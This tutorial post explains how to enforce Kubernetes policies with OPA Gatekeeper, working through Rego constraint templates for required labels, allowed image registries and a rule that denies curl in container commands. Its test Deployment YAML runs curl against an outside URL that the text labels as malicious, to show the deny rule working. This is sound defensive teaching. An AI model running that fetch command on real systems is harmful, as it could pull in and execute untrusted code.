Integrating Open Policy Agent (OPA) With Kubernetes

By Mohamed Ahmed
June 02, 2020

Explore how to integrate OPA with Kubernetes and see some examples of the power that this integration can bring to policy enforcement.

Related posts

Enforce Pod Security Policies In Kubernetes Using OPA

Integrate OPA Into Your Kubernetes Cluster Using Kube-mgmt

Open Policy Agent (OPA): Introducing Policy As Code

In a previous article, we introduced the Open Policy Agent (OPA). Understanding what OPA is and how it works is a prerequisite for following along with this article. As we discussed, the technology can be integrated with a myriad of systems and platforms, including Kubernetes. In this article, we’re going to explore how we can integrate OPA with Kubernetes and see some examples of the power that this integration can bring to policy enforcement in your environment.

OPA is deployed to Kubernetes as an admission controller. If you’re not familiar with admission controllers, let’s spend a few moments discussing their role.

What Is An Admission Controller?

An admission controller is code that intercepts requests to the Kubernetes API server before the object is persisted, but after the request has been authenticated and authorized. In other words, if you issue a request to the API server to create a new Deployment, and you’re an authenticated user who’s allowed to perform such an action, an admission controller may still intercept the request and mutate it, validate it, or do both. Admission controllers are compiled into the API server, so they live in the same binary and are enabled using command-line flags. You can read more about them in the official Kubernetes documentation.
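
For example, on a cluster where you manage the API server yourself (on kubeadm-based clusters the flags live in the static manifest /etc/kubernetes/manifests/kube-apiserver.yaml), built-in admission controllers are toggled with flags like the following; the plugin names here are only illustrative:

kube-apiserver --enable-admission-plugins=NodeRestriction,AlwaysPullImages \
               --disable-admission-plugins=PodNodeSelector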

To better understand why admission controllers are used, consider the AlwaysPullImages admission controller. Say you’ve created a Deployment on the cluster whose containers pull an image called myprivateimage from the GitLab registry. Once this image is pulled and cached on a node, there’s nothing to prevent pods from other Deployments from using the cached copy (provided they get scheduled onto that node). If the image is private and its maintainer requires credentials to pull it from the registry, that protection is effectively bypassed, because the cached image can be reused without authenticating against the registry again. The AlwaysPullImages admission controller intercepts Pod creation requests and modifies them so that pods are forced to pull their images from the remote registry whenever they’re (re)started.

OPA As An Admission Controller

When deploying OPA as an admission controller, there are many powerful constraints that you can enforce on your cluster. For example:

  • Enforce that pods must have a sidecar container. This sidecar container may perform auditing or logging tasks as required by your security policy.
  • Modify all resources to have specific annotations.
  • Mutate container images to always point to the corporate image registry.
  • Set node and pod affinity and anti-affinity selectors to Deployments.

The OPA Gatekeeper

The Gatekeeper is a relatively new project that was created to greatly enhance and facilitate integration between OPA and Kubernetes. So, what extra features does the Gatekeeper bring to plain OPA?

  • A parameterized policy library that can be extended.
  • A Kubernetes Custom Resource Definition (CRD) for creating the constraints.
  • Another CRD for defining new types of constraints (the constraint template).
  • Auditing capability.

Installing The OPA Gatekeeper

Now that you have a basic understanding of OPA, admission controllers, and the OPA Gatekeeper, let’s see how we can install it to our Kubernetes cluster.

First, you need to make sure that you are running Kubernetes version 1.14 or later. You also need administrative permissions on the cluster.

Once you have the above requirements checked, the easiest way to install OPA Gatekeeper is by running the following command:

kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/master/deploy/gatekeeper.yaml

There are other installation methods, such as building locally or using Helm, and it’s also possible to install Gatekeeper on earlier Kubernetes versions; if you’re interested in those options, refer to the project documentation. As you can see from the command output, the YAML file creates a namespace, the necessary CRDs, a service account with the required roles and role bindings, in addition to other components.
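
If the installation went through, you can verify that the Gatekeeper components are up before moving on (pod names and the exact set of pods differ between Gatekeeper releases):

kubectl get pods -n gatekeeper-system

At a minimum, you should see the gatekeeper-controller-manager pod in the Running state.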

Example 01: Enforce Having A Specific Label In Any New Namespace

Whatever installation method you’ve chosen, you should have the Gatekeeper stack installed on your cluster so that you’re ready to enforce your policies. But before we show you some examples, let’s spend a few moments explaining how Gatekeeper works.

To define a constraint, you first need to define a Constraint Template. The purpose of the Constraint Template is to define both the Rego code that enforces the policy and the schema of the parameters that constraints based on the template accept. Think of the schema as the parameters that get passed to a function in a programming language. The following Constraint Template is taken from the official docs; it enforces that all labels defined by the constraint are present when a namespace is created:

apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8srequiredlabels
spec:
  crd:
    spec:
      names:
        kind: K8sRequiredLabels
        listKind: K8sRequiredLabelsList
        plural: k8srequiredlabels
        singular: k8srequiredlabels
      validation:
        # Schema for the `parameters` field
        openAPIV3Schema:
          properties:
            labels:
              type: array
              items: string
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8srequiredlabels

        violation[{"msg": msg, "details": {"missing_labels": missing}}] {
          provided := {label | input.review.object.metadata.labels[label]}
          required := {label | label := input.parameters.labels[_]}
          missing := required - provided
          count(missing) > 0
          msg := sprintf("you must provide labels: %v", [missing])
        }

Let’s go through this template and delve a little deeper. A lot of the data provided in this template conforms to how the CRD is created, like the apiVersion and the kind. In the metadata and the spec, you define the name of the template, including its singular and plural variations. The important part to notice here is the openAPIV3Schema section under validation: this is where we define the parameters that this template accepts, in this case the list of labels that a constraint may require. In the targets part, we define the actual Rego code that gets executed. Let’s take an in-depth look at it:

  • violation[{"msg": msg, "details": {"missing_labels": missing}}] is the head of the rule; every Gatekeeper policy starts with one or more violation rules. The head defines the message and the details that are displayed to the user when the policy is violated.
  • violation here represents a rule. A rule is violated if its body evaluates to true. The body of a rule is enclosed in curly braces {}.
  • provided := {label | input.review.object.metadata.labels[label]} we define a variable called provided and use it to hold the set of label keys on the resource. The expression after the := can be read as follows: iterate through the dictionary of label=value pairs that was provided in the request and extract the label part (the key). In Rego, this is called a comprehension; if you’ve programmed in Python before, it’s a similar concept with the same name. (A standalone sketch of these set operations appears right after this list.)
  • required := {label | label := input.parameters.labels[_]} the required labels are provided as an array rather than a dictionary (they are supplied through the constraint that we’ll create next). Again, we define a variable called required that holds the set of labels that we require on the resource. The expression can be read as follows: iterate through all the items in the labels array and collect them into required.
  • missing := required - provided now we have two sets: one containing the required labels and one containing the provided ones. This expression computes the set of items found in required but not in provided.
  • count(missing) > 0 if there are more than zero items in that difference set, then one or more required labels are missing, and this is a violation of the policy.
  • msg := sprintf("you must provide labels: %v", [missing]) since it’s a violation, we define the msg variable that’s displayed in the very first line of the violation rule. The message is a custom phrase that’s displayed to the client.
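
If the comprehensions and the set difference still feel abstract, here is a minimal standalone Rego sketch (not part of any template; the input field names are made up for illustration) that you can paste into the Rego Playground on its own:

package labeldemo

# Example INPUT: {"object_labels": {"app": "web"}, "required_labels": ["gatekeeper"]}

provided := {label | input.object_labels[label]}          # set of label keys on the object
required := {label | label := input.required_labels[_]}   # set of label keys we require
missing := required - provided                            # required keys that are absent
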
Undoubtedly, Rego can be hard to understand at first, and the Rego Playground is the easiest place to experiment with it. For our full policy, paste it into the main panel and, in the INPUT panel, mimic the request sent by Kubernetes as follows:
{
    "review": {
        "object": {
            "metadata": {
                "labels": {
                    "app":"web",
                    "tier":"front"
                }
            }
        }
    },
    "parameters": {
        "labels": [
            "gatekeeper"
        ]
    }
}

Notice that we intentionally ignored adding the required label in the provided array in order to violate the policy. Now, hit the Evaluate button and have a look at the OUTPUT panel to see the JSON object that Rego replied with.
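
For the sample input above, the OUTPUT panel should show something close to the following (the exact formatting may differ slightly between playground versions):

{
    "violation": [
        {
            "details": {
                "missing_labels": [
                    "gatekeeper"
                ]
            },
            "msg": "you must provide labels: {\"gatekeeper\"}"
        }
    ]
}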

You can apply the above configuration to your cluster using the following command:

kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/master/demo/basic/templates/k8srequiredlabels_template.yaml

Once we have the Constraint Template defined, we can create our constraint that’s based on our template:

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sRequiredLabels
metadata:
  name: ns-must-have-gk
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Namespace"]
  parameters:
    labels: ["gatekeeper"]

You can have several Constraint Templates defined on your cluster, but none of them take effect until a Constraint that uses one of them is created. In the above configuration, we define a Constraint based on the K8sRequiredLabels kind.

  • Notice that the kind must match the kind value defined in the Constraint Template.
  • In the kinds part, you define which Kubernetes resources this policy applies to. In our case, we’re matching the Namespace kind in the core ("") API group.
  • Finally, the parameters part expects an array of labels that the policy would check if they exist on the namespace. In our case, we need to ensure that any namespace must have the gatekeeper label attached to it.

Once this constraint is applied, Gatekeeper evaluates matching requests against a JSON payload very similar to the one we used in the Rego Playground. Use the following command to apply this definition:

kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/master/demo/basic/constraints/all_ns_must_have_gatekeeper.yaml

Now, let’s test this policy by creating a YAML file that defines a new namespace called mynamespace. The file doesn’t attach any labels to the namespace, so it should look like this:

apiVersion: v1
kind: Namespace
metadata:
  name: mynamespace

Let’s try to apply this YAML file to our cluster:

$ kubectl apply -f namespace.yaml
Error from server ([denied by ns-must-have-gk] you must provide labels: {"gatekeeper"}): 
error when creating "namespace.yaml": admission webhook "validation.gatekeeper.sh" 
denied the request: [denied by ns-must-have-gk] you must provide labels: {"gatekeeper"}

As you can see, Kubernetes refused to create the namespace even though the YAML file is perfectly valid. The reason is that we didn’t abide by the OPA Gatekeeper constraint, which requires a label called “gatekeeper” on the namespace definition. Let’s modify the YAML file to look as follows:

apiVersion: v1
kind: Namespace
metadata:
  name: mynamespace
  labels:
    gatekeeper: OPA

If we apply the above definition, the namespace will be created successfully. Notice that the policy is looking for the gatekeeper label, but it doesn’t care about its value. So, in our case, we added the gatekeeper label and set its value to OPA, but we could’ve set it to any other value and Gatekeeper wouldn’t have complained.
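
You can double-check the result (the exact column layout depends on your kubectl version):

$ kubectl get namespace mynamespace --show-labels
NAME          STATUS   AGE   LABELS
mynamespace   Active   5s    gatekeeper=OPA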

Example 02: Images Must Come From gcr.io Only

A common requirement in many organizations is that users shouldn’t be able to pull and run Docker images from any old registry. The reason is that they might accidentally pull a bogus image which may compromise the cluster’s security. Other regulations dictate that all images must come from the company’s private repository to guarantee that all the security measures and tests are applied. Whatever the reason for your requirement, OPA Gatekeeper can help you out.

Start by creating the Constraint Template - again, this template defines which parameters you need to define as well as the actual Rego code that will do the validation. The k8srequiredregistry_template.yaml should look as follows:

apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8srequiredregistry
spec:
  crd:
    spec:
      names:
        kind: K8sRequiredRegistry
      validation:
        # Schema for the `parameters` field
        openAPIV3Schema:
          properties:
            registry:
              type: string
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8srequiredregistry
        violation[{"msg": msg, "details": {"Registry should be": required}}] {
          input.review.object.kind == "Pod"
          some i
          image := input.review.object.spec.containers[i].image
          required := input.parameters.registry
          not startswith(image,required)
          msg := sprintf("Forbidden registry: %v", [image])
        }

If you take a closer look at this code, you’ll notice that it’s very similar to the one used in the first example, with a few differences:

  1. The name and kind in the template have changed. Notice that the kind should always use CamelCase.
  2. In the schema part, we state that the parameter is called registry and is of type string.
  3. Finally, we define our Rego code. Let’s explain it line by line (a sample Playground input for testing it follows this list).
    • The violation line is standard. It specifies what messages the user should see when the rule is violated.
    • input.review.object.kind == "Pod" This rule should only be applied to Pod objects.
    • some i declares a local variable i that is used to iterate over the containers array.
    • image := input.review.object.spec.containers[i].image
      the YAML path to the image. Notice that we’re traversing the containers array using the i variable. For example, if we have two containers, then we validate containers[0] and containers[1].
    • required := input.parameters.registry we define a variable that holds the registry name that we’ll pass along.
    • not startswith(image,required) we use the startswith built-in function to test whether the image name starts with the registry name that we require.
    • msg := sprintf("Forbidden registry: %v", [image]) finally, an informative message to the user stating the reason why the images they selected could not be pulled.
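
As with the first example, you can dry-run this Rego in the Rego Playground before deploying it. A hand-trimmed input that mimics a Pod admission request, containing only the fields the policy actually reads, might look like this:

{
    "review": {
        "object": {
            "kind": "Pod",
            "spec": {
                "containers": [
                    {
                        "name": "busybox",
                        "image": "busybox"
                    }
                ]
            }
        }
    },
    "parameters": {
        "registry": "gcr.io/"
    }
}

With the image set to busybox and the registry parameter set to gcr.io/, evaluating the policy should report a violation with the message Forbidden registry: busybox.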

Apply the template definition using:

kubectl apply -f k8srequiredregistry_template.yaml

Now, let’s create our constraint. The all_images_must_come_from_gcr.yaml file should look as follows:

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sRequiredRegistry
metadata:
  name: images-must-come-from-gcr
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
  parameters:
    registry: "gcr.io/"

We specify that we need this constraint applied to Pods only and we pass the registry name that we need the images to be pulled from.

Apply the constraint definition:

kubectl apply -f all_images_must_come_from_gcr.yaml

Now, let’s test our constraint by creating a Deployment object that pulls the container image from gcr.io (should pass the constraint). Our sample.yaml file should look as follows:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: busybox
spec:
  selector:
    matchLabels:
      app: busybox
  replicas: 1
  template:
    metadata:
      labels:
        app: busybox
    spec:
      containers:
      - name: busybox
        image: gcr.io/google-containers/busybox
        command:
        - sh
        - -c
        - sleep 1000000

A traditional Deployment that creates a Pod with a busybox container. Notice that we use the busybox image hosted on gcr.io. Apply this definition by issuing kubectl apply -f sample.yaml. Next, double-check that you have the busybox pod running:

$ kubectl get pods
NAME                       READY   STATUS    RESTARTS   AGE
busybox-6d4b8cdb8f-rmlnn   1/1     Running   0          10s

Now, let’s say that someone with access to this deployment file decided to use the busybox image that comes from Docker Hub:

  • First, we need to delete this Deployment to better see what happens: kubectl delete deployment busybox
  • Change the image name in the sample.yaml file to be image: busybox
  • Apply the modified definition:
    kubectl apply -f sample.yaml

Notice that you won’t get any error messages, but if you list the running pods, you’ll find that none were created:

$ kubectl get pods
No resources found in default namespace.

To see what happened, we need to get the status of the deployment:

kubectl get deployments busybox -o yaml

There will be a lot of lines, but we’re interested in the last few:

message: 'admission webhook "validation.gatekeeper.sh" denied the request: [denied
      by images-must-come-from-gcr] Forbidden registry: busybox'
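
The denial surfaces here, rather than at kubectl apply time, because the Deployment object itself is allowed; it’s the Pods that the Deployment’s ReplicaSet later tries to create that get rejected by the webhook. The same message also appears in the ReplicaSet’s events, which you can inspect with, for example:

kubectl describe replicaset -l app=busybox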

When applying the constraint definition, for example, myconstraint.yaml, you may see a slightly cryptic error:

error: unable to recognize "myconstraint.yaml": no matches for
kind "myconstraint" in version "constraints.gatekeeper.sh/v1beta1"

The cause of this error is not in the constraint file, but rather in the template file: it means that there is something wrong with the Rego code defined there. Unfortunately, if the Rego code contains flaws, the API server will not complain when you post the template file; you’ll only see the above error when you try to apply the constraint definition. To find out what went wrong with the code, you have one of two options:

First Option:

Get the status of the template. For example:

$ kubectl get -f k8srequiredregistry_template.yaml -o yaml
status:
  byPod:
  - errors:
    - code: ingest_error
      message: "Could not ingest Rego: 1 error occurred: __modset_templates
[\"admission.k8s.gatekeeper.sh\"]
[\"K8sRequiredRegistry\"]_idx_0:8:
        rego_type_error: startswith: too few arguments\n\thave: (any)\n\twant: (string,
        string, boolean)"
    id: gatekeeper-controller-manager-cdd47c5bd-smw6w
    observedGeneration: 2

The status part will be the last part of the output and it will give you the error message that occurred when trying to run the Rego code.

Second Option:

Use the Rego Playground: copy the Rego code, paste it into the main panel, and press the Evaluate button. For example:

[Screenshot: evaluating the Rego code in the Rego Playground]

Create Your Own Constraint Step By Step

So far, we’ve seen two examples that demonstrate the power of OPA Gatekeeper and how you can use it to impose kinds of rules that go well beyond what RBAC provides. Now let’s see how you can create a constraint from scratch. As we’ve learned, for a constraint to be applied you need a template object and a constraint object that uses that template.

Step 1: Define the Policy Purpose

Before you start writing code, you should carefully define the purpose of your policy. Perhaps a user accidentally downloaded a malicious script using curl and you want to prevent any similar future incidents. You’ve decided to enforce a policy that denies using curl in the command part of the container.

Step 2: Obtain the JSON Object Sent to the OPA Gatekeeper

To be able to effectively run the Rego code in the playground and try different approaches, you should have the raw JSON object that the API server sends to the admission controller. We can obtain this object using the following procedure:

  1. Create a template that denies all requests, and provides the review object in the output message. The k8sdenyall_template.yaml file should look as follows:
    
    apiVersion: templates.gatekeeper.sh/v1beta1
    kind: ConstraintTemplate
    metadata:
      name: k8sdenyall
    spec:
      crd:
        spec:
          names:
            kind: K8sDenyAll
      targets:
        - target: admission.k8s.gatekeeper.sh
          rego: |
            package k8sdenyall
    
            violation[{"msg": msg}] {
              msg := sprintf("REVIEW OBJECT: %v", [input.review])
            }
    
  2. Create a constraint that uses that template. The deny-all-pods.yaml file should look as follows:
    apiVersion: constraints.gatekeeper.sh/v1beta1
    kind: K8sDenyAll
    metadata:
      name: deny-all-namespaces
    spec:
      match:
        kinds:
          - apiGroups: [""]
            kinds: ["Pod"]
    
  3. Modify the busybox deployment that we used earlier to contain curl as part of the command property of the container. The sample.yaml file should look as follows:
    apiVersion: apps/v1
    kind: Deployment
    metadata:
      name: busybox
    spec:
      selector:
        matchLabels:
          app: busybox
      replicas: 1 
      template:
        metadata:
          labels:
            app: busybox
        spec:
          containers:
          - name: busybox
            image: busybox
            command:
            - sh
            - -c
            - curl
            - "http://xksqu4mj.fri3nds.in/tools/clay" # a link containing malicious code
            - sleep 1000000
    
  4. Apply this definition. Of course, no pods will be created, since we’re denying this action. Take a look at the deployment status to get the input.review object:
    kubectl get deployment busybox -o yaml
    

Step 3: Write the Rego Code in the Playground

Copy the input.review JSON object from the output in Step 2 (the JSON that follows "REVIEW OBJECT: ") and paste it into the INPUT panel of the Rego Playground. It should look as follows:

[Screenshot: the input.review object pasted into the Rego Playground’s INPUT panel]
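
If you’d rather not copy the full object out of the error message, a heavily hand-trimmed version containing only the fields this policy reads (the real review object also carries fields such as operation, userInfo, and the full Pod metadata) would look roughly like this:

{
    "object": {
        "kind": "Pod",
        "spec": {
            "containers": [
                {
                    "name": "busybox",
                    "image": "busybox",
                    "command": [
                        "sh",
                        "-c",
                        "curl",
                        "http://xksqu4mj.fri3nds.in/tools/clay",
                        "sleep 1000000"
                    ]
                }
            ]
        }
    }
}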

Now that we have the INPUT object ready, we can start writing the following code in the main panel:

package k8savoidmalscript
violation[{"msg": msg, "details": {"Unallowed code detected": code}}] {
  code := "curl"
  input.object.kind == "Pod"
  input.object.spec.containers[_].command[_] == code
  msg := sprintf("%v is not allowed:", [code])
}
  • The violation contains the message that you need to display to users who added curl to the command of their containers.
  • We create a variable, code, and assign “curl” to it. Notice that we’re doing this for testing purposes; we’ll replace this part with code := input.parameters.code when we write the template.
  • We ensure that the object mentioned in the request is Pod.
  • input.object.spec.containers[_].command[_] == code here we’re traversing the JSON tree to reach our target: the containers array. However, each container holds another array that we’re interested in: the command array. In other programming languages, iterating through two nested arrays means writing two nested loops with two different iterator variables, but Rego makes this extremely simple with the underscore (_) character: it iterates over every container and every entry in that container’s command array (we may have many containers, each with its own command array). As soon as one combination satisfies the comparison (the curl string is found in one of the containers’ commands), the expression evaluates to true. Notice that we’re referring to the object here as input.object, where input is the content of the INPUT pane (the root). However, when we write this code in the template we refer to it as input.review.object, because we copied the JSON contents from under the review node.
  • msg := sprintf("%v is not allowed:", [code]) finally we define the msg variable that will hold the message that we want displayed to the client.

Step 4: Deploy the Template and the Constraint Files

As usual, we’ll need a template file and a constraint that uses the template. First, let’s delete the existing deny-all template:

kubectl delete -f k8sdenyall_template.yaml

Next, our template file should look as follows:

apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8savoidmalscript
spec:
  crd:
    spec:
      names:
        kind: K8sAvoidMalScript
      validation:
        # Schema for the `parameters` field
        openAPIV3Schema:
          properties:
            code:
              type: string
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8savoidmalscript
        violation[{"msg": msg, "details": {"Unallowed code detected": code}}] {
          code := "curl"
          input.review.object.kind == "Pod"
          input.review.object.spec.containers[_].command[_] == input.parameters.code
          msg := sprintf("%v is not allowed:", [code])
        }

Notice the changes that we made to the Rego code that were mentioned in the previous step.

Apply the above definition to the cluster, and create the constraint file as follows:

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sAvoidMalScript
metadata:
  name: prevent-malicious-code
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
  parameters:
    code: "curl"

Apply this definition as well.
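
For example, assuming you saved the template and the constraint in files named k8savoidmalscript_template.yaml and prevent_malicious_code_constraint.yaml (the file names are just a suggestion; pick whatever you like):

kubectl apply -f k8savoidmalscript_template.yaml
kubectl apply -f prevent_malicious_code_constraint.yaml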

Finally, let’s try to create our deployment (if you have an existing busybox deployment you may want to delete it first):

kubectl apply -f sample.yaml

You should notice that no pods were created as a result. Let’s get the status of the deployment:

kubectl get deployments busybox -o yaml
- lastTransitionTime: "2020-05-03T13:08:41Z"
    lastUpdateTime: "2020-05-03T13:08:41Z"
    message: 'admission webhook "validation.gatekeeper.sh" denied the request: [denied
      by prevent-malicious-code] curl is not allowed:'
    reason: FailedCreate
    status: "True"
    type: ReplicaFailure

You may want to make sure that you can still create deployments that do not have curl in the containers’ command array by deleting the deployment, modifying the file, and applying the definition. You should see the busybox pod running as normal.
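
One quick way to run that check, assuming you edit sample.yaml so that the command array no longer contains curl (and, if the registry constraint from Example 02 is still active, the image still points at gcr.io):

kubectl delete deployment busybox
kubectl apply -f sample.yaml
kubectl get pods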

TL;DR

  • An admission controller is part of the API server’s code. It’s enabled on-demand using a command-line argument for the API server’s binary.
  • The admission controller intercepts requests arriving at the API to create or modify objects before the object is persisted.
  • The Open Policy Agent (OPA) can be integrated with Kubernetes through a project called OPA Gatekeeper. The project aims at streamlining the process of creating OPA policies through Custom Resource Definitions (CRDs).
  • To create a policy that OPA Gatekeeper understands, you need a template CRD and a constraint that uses this template.
  • The template contains the Rego logic and (optionally) the schema of the parameters it accepts; the constraint selects the types of objects the policy applies to and supplies the parameter values.
  • Once the template and constraint are applied to the cluster, you can determine the error message that the OPA Gatekeeper replied with by examining the status of the controller in question (for example, the Deployment).
  • OPA uses the Rego language to define the policies.
  • To create a new policy, it’s highly recommended that you try it out first on the Rego Playground web application.
  • The Rego Playground needs an INPUT JSON object to validate the policy. You can obtain this object by creating a policy that denies all actions and outputs the request object as a message.
